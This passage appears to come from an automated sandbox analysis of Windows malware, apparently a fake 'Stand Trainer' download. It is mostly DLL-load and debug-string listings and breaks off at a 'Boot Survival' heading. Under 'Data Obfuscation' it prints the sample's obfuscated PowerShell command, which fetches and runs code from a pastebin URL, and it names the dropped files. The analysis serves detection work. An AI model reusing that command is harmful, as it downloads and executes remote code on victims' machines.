Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.1.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\mscorlib.pdbl] source: powershell.exe, 0000000C.00000002.1746802564.000002927D9E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000C.00000002.1746099211.000002927D9A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll\YC source: powershell.exe, 00000001.00000002.1549184232.0000026CA95F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb4e089 source: powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000011.00000002.1844743189.000002409836A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbAf9(@ source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.pdbhP source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb$ source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb] source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbw source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.pdb source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1549184232.0000026CA95E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1746099211.000002927D9D7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1745296458.000002927D952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbk source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbG source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb: source: powershell.exe, 00000001.00000002.1549184232.0000026CA96D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbl source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb? source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbY source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs source: powershell.exe, 00000001.00000002.1549184232.0000026CA96D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbpw source: powershell.exe, 00000001.00000002.1549184232.0000026CA95F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdbc source: powershell.exe, 00000001.00000002.1549184232.0000026CA95E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb9 source: powershell.exe, 00000011.00000002.1844743189.000002409836A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1745296458.000002927D952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1844743189.000002409836E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdbA* source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000C.00000002.1745296458.000002927D966000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationib.pdb source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbp; source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbc source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1746099211.000002927D9A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbix source: powershell.exe, 0000000C.00000002.1746099211.000002927D9D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbo source: powershell.exe, 0000000C.00000002.1745296458.000002927D966000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000C.00000002.1746802564.000002927D9E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb% source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\forfiles.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: Stand_Trainer_Updated.exe.1.dr Static PE information: 0xEDF7F89D [Fri Jul 6 22:13:49 2096 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAAC6300BD pushad ; iretd 1_2_00007FFAAC6300C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAAC70A843 pushad ; ret 1_2_00007FFAAC70A841
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAAC70585B push ebx; retf 1_2_00007FFAAC7059DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAAC70A81D pushad ; ret 1_2_00007FFAAC70A841
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe Code function: 6_2_00007FFAAC6650AD push E95633B4h; ret 6_2_00007FFAAC6650F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAC6774EB push ebx; iretd 12_2_00007FFAAC67756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAC67757B push ebx; iretd 12_2_00007FFAAC67756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAC66EEA7 push ebp; ret 12_2_00007FFAAC66EEA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAC67782E pushad ; iretd 12_2_00007FFAAC67785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAC67785E push eax; iretd 12_2_00007FFAAC67786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAC6600BD pushad ; iretd 12_2_00007FFAAC6600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAC736DC3 push edi; iretd 12_2_00007FFAAC736DC6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Backend.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe

Boot Survival

